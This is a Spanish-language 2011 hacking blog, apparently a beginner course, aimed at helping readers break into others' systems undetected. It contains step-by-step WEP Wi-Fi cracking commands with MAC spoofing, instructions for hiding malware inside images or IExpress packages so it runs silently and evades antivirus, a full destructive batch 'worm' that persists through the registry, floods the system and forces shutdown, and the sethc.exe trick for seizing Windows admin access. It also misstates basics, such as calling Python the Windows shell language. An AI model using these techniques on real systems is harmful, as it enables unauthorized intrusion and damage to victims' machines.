lunes, 29 de agosto de 2011

Iniciarse realmente en el hacking

Bueno hasta ahora habia realizado el blog segun lo que yo creia que seria mas o menos productivo para aquellos que desearan conocer cosas sobre el hacking. Ahora lo que quiero es que la gente que realmente le interese un poco este tema me envie un correo diciendome sencillamente lo que le gustaria que tratara en un articulo. Asi de sencillo.

Un saludo!

miércoles, 22 de junio de 2011

Hacking de Redes Wifi

Planificación:
- Introducción
- Live Cd/Usb
- Intrusion Windows de forma fisica
- Introducción a Python y distintos tipos de virus
- Bindear archivos
- Rastreo de sistemas
- Escanear vulnerabilidades
- Ocultación de ip
- Reventar contraseñas por fuerza bruta
- Explotar e intrusión a un PC remoto
- Hackear Redes WIFI

Capitulo x:
Debido a que algunos de vosotros me habeis dicho que estaria interesante eso de saber hackear las redes wifi os dejo aqui este articulo, espero que lo entendais todo, y si ves que algo no lo entendeis me lo decis.

Para comenzar os recomiendo una distribucion de linux llamada backtrack, que esta especializada en test de penetracion y hacking de sistemas, actualmente esta en su version 5 y que es la leche xD! Os la podeis descargar de forma gratuita en su web: http://www.backtrack-linux.org/

Para quien no este muy puesto en esto de los live usb, yo os recomiendo que os descargeis la version de KDE que esta mejor, y la arquitectura dependera de vuestro ordenador, aunque normalmente suele ser de 32.

Una vez lo tengais en el pendrive y tal lo arrancais en el PC...

Seleccionais la version default y cuando os deje escribir poneis "startx" y acabara de cargar el OS.

A continuacion os voy a explicar como hackear una red wifi, comenzaremos con una del tipo WEP y despues os mostrare como hacer lo mismo con una de tipo WPA.

Para comenzar abrimos una consola y ponemos los siguientes comandos:

"airmon-ng" (Con ello veremos la version de la tarjeta de red que tenemos)

"airmon-ng stop wlan0" (Con esto pararemos la tarjeta de red)

"ifconfig wlan0 down" (Pararemos todas las conexiones que tengamos)

"macchanger --mac 00:11:22:33:44:55 wlan0" (Este paso es bueno ya que cambiaremos nuestra mac, por lo tanto si la persona de la red que queremos hackear nos piyara no tendria ni idea de quien somos, ya que esa mac no es verdaderamente la nuestra)

"airmon-ng start wlan0" (Volvemos a encender la tarjeta de red aunque con nuestra mac cambiada xD)

A partir de aqui empezaremos con lo que realmente es hackear la wifi:

"airodump-ng wlan0" (Al hacer esto vereis que os empiezan a aparecer muchas wifis, pues son todas las que vuestro ordenador coge, debereis seleccionar una que sea tipo WEP y de la cual recivais #Data)

**Por cierto para los que no esten familiarizados con linux para terminar este tipo de procesos pulsar CTRL+C**

"airodump-ng -c X -w undercode --bssid xx:xx:xx:xx:xx wlan0" (A ver, en X tendreis que poner el CH, es decir el canal en el que se encuentra dicha red, y en xx:xx:xx:xx:xx la bssid de la red a hackear. Con este comando nos acomplamos a la red)

A continuacion habrimos una nueva consola sin detener el comando anterior, y en la nueva ponemos:

"aireplay-ng -1 0 -a xx:xx:xx:xx:xx -h 00:11:22:33:44:55 -e X wlan0" (Donde aparece xx:xx:xx:xx:xx tendremos que poner el bssid de STATION de la red a hackear, y en X la essid de la red a hackear que es el nombre que tiene. Con este comando lo que haremos hacer que la red a hackear nos acepte dentro de la red. En este paso unicamente saldran un par de cosas, asique si veis que os entra en un bucle sera porque algo esta fallando, ya sea porque la wifi esta muy lejos o por otras cosas)

"aireplay-ng -3 -b xx:xx:xx:xx:xx -h 00:11:22:33:44:55 wlan0" (Donde tenemos xx....xx introduciremos la misma bssid de antes, es decir la de STATION. Este comando sirve para inyectar trafico y con ello poder capturar la contraseña de la red. Por lo tanto una vez echo esto vereis que los #Data aumentan muchisimo mas rapido)

Y para terminar y sin cerrar ninguna de las dos ventanas abrimos una nueva y ponemos lo siguiente:

"airecrack-ng undercode-01.cap" (Con este comando hackearemos por fin la red, y nos dara la contraseña. Dependiendo de la contraseña necesitara mas o menos #Data, pero de vez en cuando darle a y ya vereis como en muy poco os la saca)


Bueno espero que os sirva este pequeño tutorial para poder hackear las redes WEP, en cuanto puedo me pondre con las WPA, aunque ya os digo que son mas complicadas... Bueno para terminar os dejo aqui algunas cosillas utiles.

Caracteres:
"-" en linux lo conseguis con la tecla ?
":" en linux lo conseguis con la tecla Ñ


Suerte y con cualquier duda avisarme!


martes, 14 de junio de 2011

Bindear archivos

Planificación:
- Introducción
- Live Cd/Usb
- Intrusion Windows de forma fisica
- Introducción a Python y distintos tipos de virus
- Bindear archivos
- Rastreo de sistemas
- Escanear vulnerabilidades
- Ocultación de ip
- Reventar contraseñas por fuerza bruta
- Explotar e intrusión a un PC remoto
- Hackear Redes WIFI

Capitulo 5:
Para comenzar voy a explicar que es esto de bindear archivos... Pues bien significa que vamos a juntar varios archivos en uno unicamente, algo que es indispensable y muy eficaz a la hora de realizar y mandar malware como virus y demas...

Tenemos dos metodos de ocultar los archivos:

-La primera es utilizando el programa winRar, que todos tenemos. Para ello tenemos que crear un archivo .rar con el programa ejecutable, ya sea del virus o de lo que nosotros queramos, seleccionando antes la opcion de hidden y autoejecutable. Una vez tenemos el .rar con el ejecutable nos vamos mediante la consola de comandos a la direccion en la que hayamos guardado el .rar y una imagen. Y una vez alli ponemos lo siguiente :
copy /b imagen.gif + fusion.rar resultado.gif 
Lo que conseguiremos con esto es unir nuestro .rar autoejecutable junto a una imagen y dar como resultado esa misma imagen, pero con el nombre que queramos y el virus/malware dentro de el.
Hay que tener cuidado con esto ya que si fuera algun tipo de gusano si abrimos la imagen quedariamos infectados ya que aunque no lo veamos se esta ejecutando en modo oculto.

-La otra forma de ocultar archivos es mediante un programa que viene de seria instalado en windows, para poder abrir este programa nos vamos a Inicio->Ejecutar.. e introducimos Iexpress. Un dato importante es que este programa unicamente es capaz de juntar archivos .exe.

Una vez hecho esto nos aparecera el programa, y para crear los archivos ocultos hacemos lo siguiente:
1*Create new Self Extration Directive file
2*Extract files and run....
3*A continuacion introducimos el nombre del paquete que vamos a crear
4*No prompt
5*Do not display a license
6*Introducimos los dos archivos .exe, tanto el del malware como el de verdad
7*Aqui tenemos que insertar en Install program el virus, y en el otro el que queremos que vea el usuario
8*Aqui por supuesto que seleccionamos Hidden xD
9*No message
10*introduccimos el nombre del archivo que vamos a crear, y seleccionamos la opcion de "Hide File ..."
11*Por ultimo seleccionamos la opcion de "No restart"
12*Don´t save
13*Crear el paquete.

Y ya esta, ya tendriamos nuestro virus/malware o programa escondido dentro de otro y totalmente indetectable a los antivirus.

Quien este interesado en el tema y desee mas información que ponga un comentario o hable conmigo para que le pase algunos textos mucho mas detallados sobre el tema.

martes, 7 de junio de 2011

Introducción a Python y distintos tipos de virus

Planificación:
- Introducción
- Live Cd/Usb
- Intrusion Windows de forma fisica
- Introducción a Python y distintos tipos de virus
- Bindear archivos
- Rastreo de sistemas
- Escanear vulnerabilidades
- Ocultación de ip
- Reventar contraseñas por fuerza bruta
- Explotar e intrusión a un PC remoto
- Hackear Redes WIFI

Capitulo 4:
Lo primero que quiero que sepan es que este articulo seria realmente muy extenso ya que se trata tanto las principales caracteristicas del lenguaje de programacion Python, de como comenzar a programar en dicho lenguaje. Ademas hablaremos de los distintos tipos de virus, de como los antivirus son capaces de detectarlos y como podemos hacer nosotros nuestro propio virus gusano.

Lo primero, Python es un lenguaje de programación de alto nivel que es exactamente el mismo que utilizamos para navegar por la consola de comandos de windows, asique para algunos les sera familiar. Este lenguaje concretamente es muy eficaz a la hora de programar algunos tipos de virus como son los gusano.

Encontré un texto de una revista llamada hackxcrack sobre como comenzar la programación en Python por lo tanto les propongo que se lo descargen de los siguientes enlaces (http://www.mediafire.com/?ajirm8j6giaus67 y http://www.mediafire.com/?85uhi1bgh1s9x9i) y que en caso de tener cualquier duda lo pongan ya sea en el blog o en el tablon del tuenti, ya que sino este articulo seria realmente largo.

Una vez hemos entendido como trabajar con el lenguaje Python voy a explicar un poco los diferentes tipos de virus que hay. Pues bien, normalmente se suelen dividir en dos grandes grupos que son: gusanos (worms), troyanos (trojan) y backdoor.

* Los gusanos son un tipo de virus que su principal misión es la de infectar al objetivo, e ir reproduciéndose, ya sea dentro de ese mismo ordenador, en la red WLAN o mediante correos y cosas así lo que afecta a muchísima mas gente.
Crear un virus gusano (muy sencillito) es realmente fácil si sabemos algo de python, un ejemplo podría ser este:


@echo off
copy %0 %windir%\system32\explorer.bat
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v IE /t REG_SZ /d %Windir%\system32\explorer.bat
msg* El explorador explotara...
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start %random%
start %random%
start %random%
start %random%
cd\
cd %homepath%
cd escritorio
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
cd\
cd windows
mrdir %random% 
mrdir %random%
mrdir %random%
mrdir %random%
mrdir %random%
mrdir %random%
mkdir %random%
mkdir %random%
mkdir %random%
mkdir %random%
mkdir %random%
mkdir %random%
mkdir %random%
mkdir %random%
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
cd system32
mkdir %random%
mkdir %random%
mkdir %random%
mkdir %random%
mkdir %random%
mkdir %random%
mkdir %random%
mkdir %random%
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
echo explorer>>%random%.exe
shutdown -s -f -t 120 -c "Reiniciando para corregir el explorer"
del % 0
exit

Este gusano concretamente sera realmente rápido y aunque no muy silencioso, ya que ira creando gran cantidad de directorios y archivos y los ira abriendo. Como veis es un virus muy sencillo pero letal por decirlo de algún modo, ya que este virus se introduce en la carpeta del sistema operativo de windows, lo que hace que se ejecute al encender el ordenador. Por ello cada vez que encendamos el ordenador no tardaremos mucho en que se nos quede bloqueado así que cuidado al ejecutarlo.

* Los troyanos, son unos virus bastante mas sofisticados y difíciles de programar ya que son mucho mas completos. Un troyano no es mas que un servidor, cuando nosotros queremos infectar a  un PC con un troyano lo que hacemos es mandarle un servidor pero configurado, ya que ademas de ser un servidor nos permite acceder a el de forma remota debido a que dejamos un puerto que nosotros queramos abierto (backdoor), ademas tienen keylogger, lo que no permite saber que es lo que esta escribiendo la victima en cada instante (también se nos guarda en un archivo). Esto concretamente es muy útil si el atacante quiere robar datos o contraseñas. Aparte de todo esto... El hacker puede hacer sencillamente lo que quiera con el PC infectado, ya que pasa a tener el control total de el.

¿Como es esto posible sin que el usuario del PC infectado se de cuenta? Pues esto es posible debido a que los atacantes borran todas sus huellas, tanto el los registros como el archivo en si entre otros.. De esto hablaremos en el capitulo de Ocultación de IP.

* Por ultimo vamos a hablar de las backdoors, que son las herramientas que utilizan los hacker para poder volver a introducirse en un PC infectado con algún tipo de virus. Este tipo de programa se vasa en poder abrir de forma permante un puerto en el PC de la victima, de forma que cada vez que encienda el ordenador el hacker pueda entrar en el.
La programación de este tipo de malware es compleja, no tanto como lo seria un troyano pero es costoso.

--------------------------------------------------------------------

Una vez hemos echo una breve pasada sobre como son los diferentes tipos de virus os voy a contar como hacen los antivirus para detectar estos tipos de malware.

Para empezar os voy a definir los dos tipos de acciones que pueden llevar acabo los antivirus para detectar dichos virus:
1- Mediante firmas (Lo utilizan todos los antivirus): Cuando un virus es descubierto por primera vez, se cogen una serie de fragmentos de código que únicamente tiene ese virus, es decir como su huella de identidad con respecto al resto. Pues bien, esos fragmentos constituyen la firma de ese virus. Dicha firma se almacena en las bases de datos de los antivirus que se actualizan diariamente para que cuando nosotros llevemos acabo un informe del antivirus pueda ir comprobando cada archivo con cada firma para saber si es algún tipo de malware o no.
Como podéis ver este método es eficaz en parte, ya que los nuevos virus o los virus que se programe uno mismo (siempre que tengan algún tipo de complejidad) no serán descubiertos por el antivirus.
2- El otro método se vasa en la heuristica, este método es mucho mas complicado, ya que lo que analiza es el comportamiento de cada programa, y en caso de ver que algo no es lo correcto o lo que hace habitualmente avisa diciendo que hay un posible virus. Este método tambien lo implementan algunas marcas antivirus aunque ni mucho menos todas.
Este método es realmente practico pero mucho mas complejo de lo que puedo explicar aquí asique les aconsejo que quien este interesado busque mas sobre el tema de la heuristica.

Antes de terminar quiero que sepan que estos métodos son efectivos siempre que el archivo vaya por si solo ya que si va acompañado de una imagen y oculto dentro de ella ninguno de los dos métodos será capaz de encontrarlo. Esto es lo que os expondré en el siguiente articulo del blog.

Por ultimo quería decir que os he subido  un archivo que contiene mucha mas información sobre virus para todo aquel que este interesado, junto con un programa portable que permite transformar nuestros archivos .bat a archivos .exe.
- Texto sobre virus: http://www.mediafire.com/?3pe77g1qs8d62ku
- Programa para pasar de .bat a .exe: http://www.mediafire.com/?lcux5smx1fcvj8b

Pues con esto terminamos el capitulo 4, espero que les sirva de ayuda y ante cualquier duda no dudeis en comentar el blog.
Un saludo!


sábado, 4 de junio de 2011

Intrusión Windows de forma física

Planificación:
- Introducción
- Live Cd/Usb
- Intrusion Windows de forma fisica
- Introducción a Python y distintos tipos de virus
- Bindear archivos
- Rastreo de sistemas
- Escanear vulnerabilidades
- Ocultación de ip
- Reventar contraseñas por fuerza bruta
- Explotar e intrusión a un PC remoto
- Hackear Redes WIFI

Capitulo 3:
Bueno para que veáis que este blog si que os va a servir de algo quiero demostraros lo realmente sencillo que puede ser meterse en un ordenador que utilice Windows (Que son la inmensa mayoría) como administrador.

Comencemos... Para empezar os voy a pedir que pulseis 5 veces la tecla shift... Cuando lo hagais vereis que os sale una ventanita verdad? Pues bien esa ventanita unicamente es para crear una serie de comandos mediante teclas, algo que no sirve para casi nada ya que no es muy utilizado. Pero lo importante es que esa accion de pulsar 5 veces dicha tecla funciona siempre en Windows, estes donde estes.

Por ello... Imagina que en vez de que aparezca un programa como el de antes te aparece una consola de comandos (Es decir la ventanita negra), pues es eso exactamente lo que vamos a hacer.

Tenemos varias posibilidades...

- En caso de que el ordenador al que queremos acceder tenga varias cuentas de usuario donde alguna de ellas carece de contraseña (Lo que buscamos es meternos en la que tiene contraseña..) lo primero que vamos a hacer es meternos en la que no esta protegida.  
  Una vez dentro iremos a la carpeta que contiene todos los archivos del sistema operativo es decir... Nos vamos a mi pc, a nuestro disco duro, buscamos la carpeta de "WINDOWS" y alli buscamos la carpeta "system32". Una vez estemos alli vamos a buscar un archivo sethc.exe, y lo borramos, despues copiamos el archivo cmd.exe en el escritorio, y le cambiamos en nombre a sethc.exe y ese archivo lo copiamos en la carpeta de "system 32".
  Despues unicamente tenemos que reiniciar el ordenador y cuando nos pida seleccionar la cuenta con la que deseamos entrar pulsamos 5 veces la tecla shift y vereis como os aparece la consola de comandos.
  Una vez ahi ponemos lo siguiente: "control userpasswords2" y vereis como nos sale el panel de contraseñas, y donde podemos desde borrar todas las cuentas hasta cambiar las contraseñas o lo que queramos asique ya esta, ya os podeis meter en la cuenta que querais si dejar rastro.

- En caso de que todas las cuentas esten bloqueadas lo que debeis hacer es cargar un sitema operativo de linux, despues hacemos lo mismo que en el anterior, buscamos el archivo sethc.exe, lo borramos y tal.. Una vez cambiados los archivos reiniciamos el ordenador cargando WINDOWS y una vez nos pida elegir la cuenta pulsamos las 5 veces la tecla shift.

Y esto es todo, la explicacion de que te deje cambiar todas las contraseñas es que al inicializar la consola desde ese punto accedes como administrador lo que te permite tener acceso al sistema entero.

Live CD/Usb

Planificación:
- Introducción
- Live Cd/Usb
- Intrusion Windows de forma fisica
- Introducción a Python y distintos tipos de virus

- Bindear archivos
- Rastreo de sistemas
- Escanear vulnerabilidades
- Ocultación de ip
- Reventar contraseñas por fuerza bruta
- Explotar e intrusión a un PC remoto
- Hackear Redes WIFI

Capitulo 2:
Para comenzar voy a explicar que es lo que es eso de un Live CD o un Live usb..
Pues bien, para que un ordenador se inicie de forma correcta carga en memoria el sistema operativo al arrancar el PC, pues con un Live CD/usb lo que hacemos es eso con la diferencia de que en vez de cargar el sistema operativo de la memoria del ordenador lo cargamos desde la un cd o un usb mediante un archivo .iso.

Para los que no lo sepas un archivo .iso es la imagen de un sistema operativo en palabras mayores, es decir que es todo lo que un ordenador necesita para poder cargar el sistema operativo.

Para crear un Live CD únicamente tenemos que descargar desde internet la imagen o el archivo .iso del sistema operativo que deseamos y lo quemamos en un cd. Después para cargar el sistema operativo que nos hemos descargado, metemos el CD en el PC, reiniciamos el ordenador y en el menú de la BIOS seleccionamos arrancar desde el lector de CD/DVD.
Una vez echo eso comenzara a cargar el sistema operativo.

Para poder crear un Live Usb es algo mas complejo ya que no solo tenemos que meter la .iso en el usb. Lo que debemos hacer es lo siguiente:
- Descargarnos un programa llamado unetbootin (http://www.mediafire.com/?up347l0w17f48ax).
Después lo arrancamos ya que no necesita de instalación.
- Seleccionamos la opción de .iso, y el lugar de nuestro PC donde tenemos guardado el archivo.
Después seleccionamos la unidad usb donde queremos instalar el sistema operativo, y una vez terminado reiniciamos el ordenador, repitiendo la misma acción que con el Live CD, pero seleccionamos en la BIOS la opción de arrancar desde el usb.

Estas son las dos formas que tenemos de arrancar el ordenador con un sistema operativo distinto al que tiene el PC.

Este capitulo es muy importante para poder realizar el siguiente con éxito.
Mas tarde hablaremos de como instalar en nuestro ordenador una maquina virtual, que es algo muy practico para poder hacer pruebas con virus creador por nosotros y ataques desde nuestro ordenador a nosotros mismo sin posibilidad de sufrir ningún riesgo.

Introducción al hacking


Planificación:
- Introducción
- Live Cd/Usb
- Intrusion Windows de forma fisica
- Introducción a Python y distintos tipos de virus
- Bindear archivos
- Rastreo de sistemas
- Escanear vulnerabilidades
- Ocultación de ip
- Reventar contraseñas por fuerza bruta
- Explotar e intrusión a un PC remoto
- Hackear Redes WIFI

Capitulo 1:
Bueno, la definición típica del hacker es: "un aficionado a los ordenadores o computadoras, un usuario totalmente cautivado por la programación y la tecnología informática. En la década de 1980, con la llegada de las computadoras personales, y posteriormente con la posibilidad de conexión a los grandes sistemas de ordenadores a través de Internet, este término adquirió una connotación peyorativa y comenzó a usarse para denominar a quien se conecta a una red para invadir en secreto computadoras, y consultar o alterar los programas o los datos almacenados en las mismas. También se utiliza para referirse a alguien que, además de programar, disfruta desensamblando sistemas operativos y programas para entender su lógica de funcionamiento". Una buena definición acerca de lo que es un hacker, y además dice algo esencial, a un hacker se le denomina delicuente pero... veamos más.

El hacking es ampliamente considerado ilegal. El movimiento hacker es estigmado, desacreditado y perseguido por los medios de comunicación y la cultura corporativa como juvenil, trastornador, y criminal. Y todo el tiempo es generalmente mal interpretado.

"Los hackers son definidos como entusiastas de la informática que tienen un interés ardiente en aprender acerca de los sistemas y como usarlos de formas inovadoras". Esta definición, por tanto, no incluye a los hackers malignos que deliberadamente rompen sistemas y borran ficheros, sino a esos hackers que exploran sistemas simplemente por el reto intelectual y que no dejan indicios de sus andaduras. Además, hay generalmente hay malos usos del término ya que en el underground informático no sólo está formado por hackers, sino también otras clases de entusiastas informáticos, por ejemplo, crackers, phreakers, piratas de software, etc. (y el público en general piensa que todos son hackers).

Si, hay "hackers" que destruyen ficheros y rompen sistemas, pero ciertamente no conforman la abrumadora mayoría de hackers, además no deben de ser llamados hackers, sino crackers. Muchos hackers, como su intención primaria, pasan completamente desapercibidos en los sistemas que eligen hackear y no son nunca descubiertos. El no dejar rastros o huellas es lo más importante de los hackers.

"Estamos sedientos de conocimientos e información, y ¿puedes entonces realmente pensar que vamos a destruir eso que es sagrado para nosotros? ¿Para quitarle la oportunidad a otro de tener éxito al entrar como nosotros lo hicimos? ¿para hechar más leña al fuego de una ya terrible reputación y aumentar las posibilidades de ser pillados y así efectivamente arruinar nuestras vidas y carreras?" [Toxic Shock: 1990]

El enemigo de los hackers son aquellos que tratan de oprimirles todo lo que pueden, el Estado y las grandes corporaciones. El hacking, como una forma de protesta socio-politica, es por tanto difamado y denunciado en los medios por estas instituciones. El hacking es un fenómeno internacional, y sus miembros van más allá de las líneas etnicas, raciales, de sexo y vocacionales.

Los hackers han sido considerados siempre un grupo marginal en la sociedad. En los colegios, lo hackers son vistos como "novatos/lerdos" y "solitarios" sin habilidades sociales; en la gran sociedad, son perseguidos por aquellos que están en el poder.

"Soy un hacker. Si alguna vez le digo eso a alguien inmediatamente se asumira que soy maligno, vandálico, ladrón, un pseudo-terrorista que sale para tomar los ordenadores del mundo en beneficio personal o probablemente para cosechar alguna satisfacción morbosa borrando megas y megas de datos valiosos. Se me asocia con el underground informático. Si alguna vez les digo eso a alguien, habrí un flujo destellante de asociaciones estúpidas en la mende de esa persona entre yo y La Mafia, con Saddam HUssein, Syria, Libya, Abu, NIdal y quien sabe que más. Casi universalmente entre la mayoría ignorante, nosotros los hackers somos considerados como gamberros peligrosos cuyo único propósito en la vida es el de causar daño como nos sea posible en el menor tiempo posible al mayor número de gente. Seguro, hay esos pequeños crios (fisica y mentalmente) que se hacen llamar 'hackers' y que concuerdan con las descripciones de arriba. Hay también gente que se hace llamar 'seres humanos' que violan, asesinan, engañan, mienten y roban cada poco minutos. Significa eso que todos los seres humanos deberían de ir a la cárcel" (Toxic Shock, 1990).

Como conclusión, tenemos que los hackers son temidos y respetados. Los hackers no son malignos, son las personas que les encata el conocimiento, la electrónica, la informatica, trata de superarse día a día. Por esta razón su intrusión en sistemas ajenos, pero no los destruye, sólo observa. Para que querríamos destruir lo que es más valioso para nosotros... la informacion. Además un hacker se preocupa por no dejar huellas, las borrar. Un hacker no busca un lucro propio ni tampoco destrozar un sistema, sino demostrarse a sí mismo que es mejor que el administrador de ese sistema. Un hacker no nace, se hace, con el conocimiento que adquiere día con día. Sin dejarse vencer por los demás, sin sentirse un criminal ya que no lo es... "El conocimiento es poder".


Fuente: http://www.wikilearning.com/tutorial/introduccion_al_hack-introduccion/4431-1
-----------------------------------------------------------------------------------------------------


Por ello, con este blog pretendo ayudar a todos aquellos que desean aprender como los hacker logran introducirse en sistemas ajenos y como logran hacerlo sin ser detectados... Para todos ellos dedico este blog con la esperanza de ayudarles a comprender esas tecnicas.

Planificacion

La planificación que seguira este blog por ahora sera la siguiente:


- Introducción
- Live Cd/Usb
- Intrusion Windows de forma fisica 
- Introducción a Python y distintos tipos de virus
- Bindear archivos
- Rastreo de sistemas
- Escanear vulnerabilidades
- Ocultación de ip
- Reventar contraseñas por fuerza bruta
- Explotar e intrusión a un PC remoto
- Hackear Redes WIFI

Donde cada semana se publicara un articulo sobre el tema junto con las diferentes formas de solucionarlo.


Todos los contenidos del blog estaran preparados para gente que se inicie en el mundo del hacking, por lo que no requiere de grandes conociemientos previos. Ademas para cada articulo habra una serie de programas y articulos de mas informacion que podreis bajar de forma gratuita y con la certeza de que no tienen ningun tipo de virus debido a que habran sido subidos por mi. Ademas en este misma direccion podreis encontrar para los que no lo tengais un buen antivirus y de forma gratuita (http://www.mediafire.com/?33fx3hqprt74he6).




Por supuesto todos aquellos que deseen tratar otro tema que no se encuentre en la planificacion pido que me lo digan mediante un comentario para tratarlo en cuanto se pueda.


**Todos los contenidos que se explicaran en este blog tienen un caracter educativo, y no me hago responsable del mal uso de esta informacion**